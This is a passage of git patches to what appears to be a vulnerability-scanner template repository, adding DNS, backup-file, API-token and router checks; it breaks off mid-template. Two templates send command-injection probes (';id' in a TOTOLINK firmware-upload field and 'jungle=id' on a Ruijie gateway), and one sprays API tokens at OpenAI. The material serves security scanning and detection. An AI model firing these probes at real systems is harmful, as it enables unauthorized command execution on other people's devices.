From 2a8297530e1ee2badbfc8c198715471685f1da82 Mon Sep 17 00:00:00 2001 From: malacupa Date: Tue, 12 Dec 2023 22:11:35 +0100 Subject: [PATCH 01/64] add saas detection for Microsoft Entra application proxy --- dns/dns-saas-service-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index d82de2443e..6fce566744 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -55,6 +55,7 @@ dns: - "servicebus.windows.net" - "visualstudio.com" - "-msedge.net" + - "msappproxy.net" - "trafficmanager.net" - type: word From daee70d4bea7392fd9aa04fc5e8a683f2cc4c035 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Sun, 17 Dec 2023 18:53:55 +0000 Subject: [PATCH 02/64] Create api-openai.yaml --- http/token-spray/api-openai.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/token-spray/api-openai.yaml diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml new file mode 100644 index 0000000000..af6e06f2b8 --- /dev/null +++ b/http/token-spray/api-openai.yaml @@ -0,0 +1,31 @@ +id: api-openai + +info: + name: OpenAI API Test + author: geeknik + severity: info + reference: + - https://platform.openai.com/docs/api-reference + metadata: + max-request: 1 + tags: token-spray,openai + +self-contained: true + +http: + - method: POST + path: + - "https://api.openai.com/v1/engines/davinci-codex/completions" + + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'invalid_request_error' + - 'Incorrect API key' + - 'invalid_api_key' + condition: or + negative: true From 04414d336405801473ffc0b0db5fbaaad8ac82f0 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Sun, 17 Dec 2023 19:18:08 +0000 Subject: [PATCH 03/64] Update api-openai.yaml --- http/token-spray/api-openai.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index af6e06f2b8..a472f5d046 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -15,12 +15,26 @@ self-contained: true http: - method: POST path: - - "https://api.openai.com/v1/engines/davinci-codex/completions" + - "https://api.openai.com/v1/chat/completions" + body: | + { + "model": "gpt-3.5-turbo", + "messages": [ + {"role": "system", "content": "You are a helpful assistant designed to output JSON."}, + {"role": "user", "content": "Who won the world series in 2020?"} + ] + } headers: Content-Type: application/json Authorization: Bearer {{token}} + + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Los Angeles Dodgers' - type: word part: body words: From 4526cde48b8ecb04ea8bfc450d6b9f44cfd9f675 Mon Sep 17 00:00:00 2001 From: Blackbird594 Date: Fri, 22 Dec 2023 10:20:03 +0000 Subject: [PATCH 04/64] Added .tar extention and Matcher for it --- exposures/backups/zip-backup-files.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index d5e647afda..f616e24b6c 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -17,6 +17,7 @@ requests: attack: pitchfork payloads: EXT: + - "tar" - "7z" - "bz2" - "gz" @@ -47,6 +48,8 @@ requests: matchers: - type: binary binary: + - "7573746172202000" #tar + - "7573746172003030" #tar - "377ABCAF271C" # 7z - "314159265359" # bz2 - "53514c69746520666f726d6174203300" # SQLite format 3. From 0eac77faddfbbe2df5b051e0f05953d8a2ee2bef Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 23 Dec 2023 12:40:35 +0000 Subject: [PATCH 05/64] Syncing Templates --- .github/workflows/templates-sync.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3c63f71a1b..010833cd7f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -55,6 +55,15 @@ on: - 'http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml' - 'http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml' - 'http/vulnerabilities/other/sslvpn-client-rce.yaml' + - 'http/cves/2018/CVE-2018-8823.yaml' + - 'http/cves/2022/CVE-2022-0087.yaml' + - 'http/cves/2023/CVE-2023-26035.yaml' + - 'http/cves/2023/CVE-2023-46359.yaml' + - 'http/cves/2023/CVE-2023-6038.yaml' + - 'http/misconfiguration/aws/cdn-cache-poisoning.yaml' + - 'http/misconfiguration/h2o/h2o-arbitary-file-read.yaml' + - 'http/misconfiguration/h2o/h2o-dashboard.yaml' + - 'http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From b75ff4d154d6274fdc794e426c49b3b980253417 Mon Sep 17 00:00:00 2001 From: Blackbird594 Date: Fri, 22 Dec 2023 10:20:03 +0000 Subject: [PATCH 08/64] Added .tar extention and Matcher for it --- exposures/backups/zip-backup-files.yaml | 74 +++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 exposures/backups/zip-backup-files.yaml diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml new file mode 100644 index 0000000000..f616e24b6c --- /dev/null +++ b/exposures/backups/zip-backup-files.yaml @@ -0,0 +1,74 @@ +id: zip-backup-files + +info: + name: Compressed Backup File + author: toufik-airane,dwisiswant0,ffffffff0x + severity: medium + tags: exposure,backup + +requests: + - method: GET + path: + - "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com + - "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com + - "{{BaseURL}}/{{DN}}.{{EXT}}" # example + - "{{BaseURL}}/{{SD}}.{{EXT}}" # www + + attack: pitchfork + payloads: + EXT: + - "tar" + - "7z" + - "bz2" + - "gz" + - "lz" + - "rar" + - "tar.gz" + - "tar.bz2" + - "xz" + - "zip" + - "z" + - "tar.z" + - "db" + - "sqlite" + - "sqlitedb" + - "sql.7z" + - "sql.bz2" + - "sql.gz" + - "sql.lz" + - "sql.rar" + - "sql.tar.gz" + - "sql.xz" + - "sql.zip" + - "sql.z" + - "sql.tar.z" + + max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and + matchers: + - type: binary + binary: + - "7573746172202000" #tar + - "7573746172003030" #tar + - "377ABCAF271C" # 7z + - "314159265359" # bz2 + - "53514c69746520666f726d6174203300" # SQLite format 3. + - "1f8b" # gz tar.gz + - "526172211A0700" # rar RAR archive version 1.50 + - "526172211A070100" # rar RAR archive version 5.0 + - "FD377A585A0000" # xz tar.xz + - "1F9D" # z tar.z + - "1FA0" # z tar.z + - "4C5A4950" # lz + - "504B0304" # zip + condition: or + part: body + + - type: regex + regex: + - "application/[-\\w.]+" + part: header + + - type: status + status: + - 200 From 43d4c153b88c6b418e3856ed5248fed851f35bce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 23 Dec 2023 22:27:26 +0700 Subject: [PATCH 10/64] fix --- http/exposures/backups/zip-backup-files.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index add5e5e76a..618ea38752 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -47,6 +47,7 @@ http: - "Release" - "inetpub" EXT: + - "tar" - "7z" - "bz2" - "gz" @@ -78,6 +79,8 @@ http: matchers: - type: binary binary: + - "7573746172202000" #tar + - "7573746172003030" #tar - "377ABCAF271C" # 7z - "314159265359" # bz2 - "53514c69746520666f726d6174203300" # SQLite format 3. @@ -101,4 +104,4 @@ http: status: - 200 -# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6b99dac13cadd5e6d2b513c494c076dc354e2ecd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 23 Dec 2023 22:28:08 +0700 Subject: [PATCH 11/64] delete old protocol --- exposures/backups/zip-backup-files.yaml | 74 ------------------------- 1 file changed, 74 deletions(-) delete mode 100644 exposures/backups/zip-backup-files.yaml diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml deleted file mode 100644 index f616e24b6c..0000000000 --- a/exposures/backups/zip-backup-files.yaml +++ /dev/null @@ -1,74 +0,0 @@ -id: zip-backup-files - -info: - name: Compressed Backup File - author: toufik-airane,dwisiswant0,ffffffff0x - severity: medium - tags: exposure,backup - -requests: - - method: GET - path: - - "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com - - "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com - - "{{BaseURL}}/{{DN}}.{{EXT}}" # example - - "{{BaseURL}}/{{SD}}.{{EXT}}" # www - - attack: pitchfork - payloads: - EXT: - - "tar" - - "7z" - - "bz2" - - "gz" - - "lz" - - "rar" - - "tar.gz" - - "tar.bz2" - - "xz" - - "zip" - - "z" - - "tar.z" - - "db" - - "sqlite" - - "sqlitedb" - - "sql.7z" - - "sql.bz2" - - "sql.gz" - - "sql.lz" - - "sql.rar" - - "sql.tar.gz" - - "sql.xz" - - "sql.zip" - - "sql.z" - - "sql.tar.z" - - max-size: 500 # Size in bytes - Max Size to read from server response - matchers-condition: and - matchers: - - type: binary - binary: - - "7573746172202000" #tar - - "7573746172003030" #tar - - "377ABCAF271C" # 7z - - "314159265359" # bz2 - - "53514c69746520666f726d6174203300" # SQLite format 3. - - "1f8b" # gz tar.gz - - "526172211A0700" # rar RAR archive version 1.50 - - "526172211A070100" # rar RAR archive version 5.0 - - "FD377A585A0000" # xz tar.xz - - "1F9D" # z tar.z - - "1FA0" # z tar.z - - "4C5A4950" # lz - - "504B0304" # zip - condition: or - part: body - - - type: regex - regex: - - "application/[-\\w.]+" - part: header - - - type: status - status: - - 200 From 0fa6a4e2c3a8cf23cff9a2540b94c4743d68edf4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:31:21 +0000 Subject: [PATCH 12/64] Auto Generated New Template Addition List [Sat Dec 23 15:31:21 UTC 2023] :robot: --- .new-additions | 61 -------------------------------------------------- 1 file changed, 61 deletions(-) diff --git a/.new-additions b/.new-additions index aa9693be58..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,61 +0,0 @@ -code/cves/2023/CVE-2023-49105.yaml -headless/cves/2018/CVE-2018-25031.yaml -http/cves/2018/CVE-2018-8823.yaml -http/cves/2021/CVE-2021-29200.yaml -http/cves/2021/CVE-2021-44910.yaml -http/cves/2022/CVE-2022-0087.yaml -http/cves/2023/CVE-2023-22232.yaml -http/cves/2023/CVE-2023-26035.yaml -http/cves/2023/CVE-2023-30534.yaml -http/cves/2023/CVE-2023-3368.yaml -http/cves/2023/CVE-2023-36144.yaml -http/cves/2023/CVE-2023-39002.yaml -http/cves/2023/CVE-2023-41265.yaml -http/cves/2023/CVE-2023-41266.yaml -http/cves/2023/CVE-2023-43177.yaml -http/cves/2023/CVE-2023-46359.yaml -http/cves/2023/CVE-2023-49070.yaml -http/cves/2023/CVE-2023-5556.yaml -http/cves/2023/CVE-2023-6018.yaml -http/cves/2023/CVE-2023-6020.yaml -http/cves/2023/CVE-2023-6021.yaml -http/cves/2023/CVE-2023-6038.yaml -http/cves/2023/CVE-2023-6380.yaml -http/cves/2023/CVE-2023-6553.yaml -http/default-logins/dataease/dataease-default-login.yaml -http/default-logins/splunk/splunk-default-login.yaml -http/exposed-panels/dataease-panel.yaml -http/exposed-panels/reportico-admin-panel.yaml -http/exposed-panels/tailon-panel.yaml -http/exposed-panels/vue-pacs-panel.yaml -http/exposed-panels/woodwing-panel.yaml -http/exposures/configs/dompdf-config.yaml -http/misconfiguration/aws/cdn-cache-poisoning.yaml -http/misconfiguration/h2o/h2o-arbitary-file-read.yaml -http/misconfiguration/h2o/h2o-dashboard.yaml -http/misconfiguration/installer/businesso-installer.yaml -http/misconfiguration/installer/chamilo-installer.yaml -http/misconfiguration/installer/espocrm-installer.yaml -http/misconfiguration/installer/knowledgetree-installer.yaml -http/misconfiguration/installer/phpgedview-installer.yaml -http/misconfiguration/installer/wowcms-installer.yaml -http/misconfiguration/mixed-active-content.yaml -http/misconfiguration/mixed-passive-content.yaml -http/misconfiguration/secnet-info-leak.yaml -http/misconfiguration/woodwing-git.yaml -http/misconfiguration/woodwing-phpinfo.yaml -http/technologies/bamboo-detect.yaml -http/technologies/element-web-detect.yaml -http/technologies/iparapheur-detect.yaml -http/technologies/matrix-homeserver-detect.yaml -http/vulnerabilities/dahua/dahua-wpms-lfi.yaml -http/vulnerabilities/dahua/dahua-wpms-rce.yaml -http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml -http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml -http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml -http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml -http/vulnerabilities/other/sslvpn-client-rce.yaml -http/vulnerabilities/other/yibao-sqli.yaml -http/vulnerabilities/other/yunanbao-rce.yaml -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml -javascript/cves/2023/CVE-2023-46604.yaml From 2c52660d51d5a20a7fe122d74ece9f250f0511d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:31:37 +0000 Subject: [PATCH 13/64] Auto Generated Templates Checksum [Sat Dec 23 15:31:37 UTC 2023] :robot: --- templates-checksum.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bf3b92a03c..acb1d61ef4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,18 +2,18 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:b4463d7ed41c0ac8f42d06c3952767923c03478e +README.md:f00189942f4fa9e414b1089ada7711614b11e85b README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:00d0be55644f406ad1bdb19f957df95152440ebe -TEMPLATES-STATS.md:83081b616907b600caa4b294556793eb55f81bf9 -TOP-10.md:9d874df00b5b3824ffaa42314a0e0549a3292446 +TEMPLATES-STATS.json:7ccb771c271fe2c18e8d9b86ffc044c3c3affd4a +TEMPLATES-STATS.md:1c9813a0af8a44e624302050722dfec4d140810c +TOP-10.md:2cd79b73aec87dde6c2ca8ef5f0df433fab3d107 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354 code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:393e94bc85a915c5e2efa4557b00fb6ccdfdec93 -cves.json-checksum.txt:f21e511ade96e01e7bb7f9d96e08e556c718e48c +cves.json:4500cac1239266cc0c96b02fc4bf689290b18f93 +cves.json-checksum.txt:f110519bd9447c733f8276833f45a4c38375f1ed dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -2882,7 +2882,7 @@ http/cves/2023/CVE-2023-4568.yaml:0bd963794f42d4383e64913b7b879782ceec2054 http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a -http/cves/2023/CVE-2023-46359.yaml:b1170e0eabce6a6a06ae81ec0ece5133da436597 +http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 @@ -4081,7 +4081,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887 -http/exposures/backups/zip-backup-files.yaml:8cf2dd99ecd30272989353d8e3436c7ebb9db30a +http/exposures/backups/zip-backup-files.yaml:47253ccff6b54b2567784cdb93e322e636337303 http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 @@ -7707,7 +7707,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:1d23d1aacf1e4190c82bd26e8dac8713e6edc398 +templates-checksum.txt:10238dd5a08d3f60e31e1a95f4f1eb8bc0349f35 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1234edc2af9b5ab9983fd0c3bd7ab4cc282ac1ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:33:16 +0000 Subject: [PATCH 14/64] Auto Template Signing [Sat Dec 23 15:33:16 UTC 2023] :robot: --- http/exposures/backups/zip-backup-files.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 618ea38752..ae605013fc 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -103,5 +103,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1b960a5ba045bf36ea054d29625ba8d82bdc3c2ff9142dd3404c7c985830e00022100ba48d514f25d68bd0a5d8e673ef37791052fc026a12860ac837c73a519dd7e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ae5055168b2cd98c731ebadabdb9e3f604342264 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 24 Dec 2023 07:55:27 +0000 Subject: [PATCH 15/64] Syncing Templates --- .github/workflows/templates-sync.yml | 61 ---------------------------- 1 file changed, 61 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 010833cd7f..b07f36c8e5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,67 +3,6 @@ on: push: paths: - '.new-additions' - - 'http/cves/2023/CVE-2023-41266.yaml' - - 'http/cves/2023/CVE-2023-43177.yaml' - - 'http/cves/2023/CVE-2023-49070.yaml' - - 'http/cves/2023/CVE-2023-5556.yaml' - - 'http/cves/2023/CVE-2023-6018.yaml' - - 'http/cves/2023/CVE-2023-6020.yaml' - - 'http/cves/2023/CVE-2023-6021.yaml' - - 'http/cves/2023/CVE-2023-6380.yaml' - - 'http/default-logins/dataease/dataease-default-login.yaml' - - 'http/default-logins/splunk/splunk-default-login.yaml' - - 'http/exposed-panels/dataease-panel.yaml' - - 'http/exposed-panels/reportico-admin-panel.yaml' - - 'http/exposed-panels/tailon-panel.yaml' - - 'http/exposed-panels/woodwing-panel.yaml' - - 'http/exposures/configs/dompdf-config.yaml' - - 'http/misconfiguration/installer/businesso-installer.yaml' - - 'http/misconfiguration/installer/chamilo-installer.yaml' - - 'http/misconfiguration/installer/knowledgetree-installer.yaml' - - 'http/misconfiguration/installer/phpgedview-installer.yaml' - - 'http/misconfiguration/installer/wowcms-installer.yaml' - - 'http/misconfiguration/secnet-info-leak.yaml' - - 'http/misconfiguration/woodwing-git.yaml' - - 'http/misconfiguration/woodwing-phpinfo.yaml' - - 'http/technologies/element-web-detect.yaml' - - 'http/technologies/matrix-homeserver-detect.yaml' - - 'http/vulnerabilities/dahua/dahua-wpms-lfi.yaml' - - 'http/vulnerabilities/dahua/dahua-wpms-rce.yaml' - - 'http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml' - - 'http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml' - - 'http/vulnerabilities/other/yibao-sqli.yaml' - - 'http/vulnerabilities/other/yunanbao-rce.yaml' - - 'javascript/cves/2023/CVE-2023-46604.yaml' - - 'headless/cves/2018/CVE-2018-25031.yaml' - - 'http/cves/2021/CVE-2021-44910.yaml' - - 'http/cves/2023/CVE-2023-22232.yaml' - - 'http/cves/2023/CVE-2023-30534.yaml' - - 'http/cves/2023/CVE-2023-3368.yaml' - - 'http/cves/2023/CVE-2023-36144.yaml' - - 'http/cves/2023/CVE-2023-39002.yaml' - - 'http/cves/2023/CVE-2023-41265.yaml' - - 'code/cves/2023/CVE-2023-49105.yaml' - - 'http/cves/2021/CVE-2021-29200.yaml' - - 'http/cves/2023/CVE-2023-6553.yaml' - - 'http/exposed-panels/vue-pacs-panel.yaml' - - 'http/misconfiguration/installer/espocrm-installer.yaml' - - 'http/misconfiguration/mixed-active-content.yaml' - - 'http/misconfiguration/mixed-passive-content.yaml' - - 'http/technologies/bamboo-detect.yaml' - - 'http/technologies/iparapheur-detect.yaml' - - 'http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml' - - 'http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml' - - 'http/vulnerabilities/other/sslvpn-client-rce.yaml' - - 'http/cves/2018/CVE-2018-8823.yaml' - - 'http/cves/2022/CVE-2022-0087.yaml' - - 'http/cves/2023/CVE-2023-26035.yaml' - - 'http/cves/2023/CVE-2023-46359.yaml' - - 'http/cves/2023/CVE-2023-6038.yaml' - - 'http/misconfiguration/aws/cdn-cache-poisoning.yaml' - - 'http/misconfiguration/h2o/h2o-arbitary-file-read.yaml' - - 'http/misconfiguration/h2o/h2o-dashboard.yaml' - - 'http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 377eb77a12d06fbed02b7352a4675f9a02e1623b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:26:03 +0530 Subject: [PATCH 16/64] Create CVE-2023-46574.yaml --- http/cves/2023/CVE-2023-46574.yaml | 59 ++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/2023/CVE-2023-46574.yaml diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml new file mode 100644 index 0000000000..18437bd2b8 --- /dev/null +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-46574 + +info: + name: TOTOLINK A3700R - Command Injection + author: DhiyaneshDk + severity: critical + description: | + An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-46574 + - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46574 + cwe-id: CWE-77 + epss-score: 0.00223 + epss-percentile: 0.60602 + cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: totolink + product: a3700r_firmware + shodan-query: title:"Totolink" + tags: cve,cve2023,totolink,router,iot,rce + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "TOTOLINK")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/cgi-bin/cstecgi.cgi" + body: | + { + "topicurl":"UploadFirmwareFile", + "FileName":";id" + } + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" + + - type: status + status: + - 200 From ff644b0be2aff47f1a4df8e6e11364e165ad0e24 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:28:56 +0530 Subject: [PATCH 17/64] trail space fix --- http/cves/2023/CVE-2023-46574.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 18437bd2b8..b72b32e83e 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -40,7 +40,7 @@ http: condition: and - method: GET - path: + path: - "{{BaseURL}}/cgi-bin/cstecgi.cgi" body: | { From f5507a81b91f208ae3a416662a24da4e508b94f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:35:52 +0530 Subject: [PATCH 18/64] Create ruijie-rg-eg-web-mis-rce.yaml --- .../ruijie/ruijie-rg-eg-web-mis-rce.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml new file mode 100644 index 0000000000..fdacc071c8 --- /dev/null +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -0,0 +1,43 @@ +id: ruijie-rg-eg-web-mis-rce + +info: + name: Ruijie RG-EG - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + Ruijie RG-EG easy gateway WEB management system front-end RCE has a command execution vulnerability. An attacker without identity authentication can execute arbitrary commands to control server permissions. + reference: + - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_WEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + metadata: + verified: true + max-request: 1 + fofa-query: body="请输入您的RG-EG易网关的用户名和密码" + tags: ruijie,router,iot,rce + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "ruijie")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/update.php?jungle=id" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 From 4a70bb80ca6b2a95c9c1c2286f774a7cf7a64227 Mon Sep 17 00:00:00 2001 From: Arm!tage Date: Mon, 25 Dec 2023 11:08:11 +0800 Subject: [PATCH 19/64] add docker daemon exposed via http --- http/exposures/docker-daemon-exposed.yaml | 51 +++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/exposures/docker-daemon-exposed.yaml diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml new file mode 100644 index 0000000000..e9601013b9 --- /dev/null +++ b/http/exposures/docker-daemon-exposed.yaml @@ -0,0 +1,51 @@ +id: docker-daemon-exposed + +info: + name: Docker Daemon Exposed + author: Arm!tage + severity: critical + description: | + Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. + metadata: + max-request: 1 + shodan-query: port:2375 product:"docker" + fofa-query: app="docker-Daemon" && port="2375" + verified: true + tags: docker,exposure + +http: + - raw: + - | + GET /version HTTP/1.1 + Host: 